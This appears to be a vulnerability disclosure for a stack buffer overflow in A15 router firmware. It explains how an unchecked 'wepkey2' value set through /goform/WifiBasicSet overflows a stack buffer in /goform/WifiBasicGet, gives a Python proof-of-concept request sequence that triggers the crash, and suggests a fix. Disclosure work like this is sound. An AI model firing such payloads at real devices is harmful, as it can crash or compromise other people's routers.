Vul8 - A15- bof - WifiBasicSet - wepkey2

We found a stack buffer overflow vulnerability at **A15 (**Firmware version V15.13.07.13).

Untitled

In the handler function for action /goform/WifiBasicSet, the user-controlled string “wepkey2” is stored into “wl2g.extra.wep_key2” via SetValue.

Untitled

Then the string is loaded from “wl2g.extra.wep_key2” and then stored into stack buffer wifi_buf_entry at /goform/WifiBasicGet. Because the length of “wepkey2” is not checked, the stack buffer can be overflowed if it is a large string.

POC

import requests

cookie = {"Cookie":"uid=1234"}

url1 = "<http://192.168.17.221:80/goform/WifiBasicSet>"
data1 = {"wepkey2" : "a"*(0x1000),
"security" : "wep"}
response = requests.post(url1, cookies=cookie, data=data1)

url2 = "<http://192.168.17.221:80/goform/WifiBasicGet>"
data2 = {}
response = requests.post(url2, cookies=cookie, data=data2)
print(response.text)
print(response)

Fix Suggestion

GetValue function should accept a length argument to avoid buffer overflow.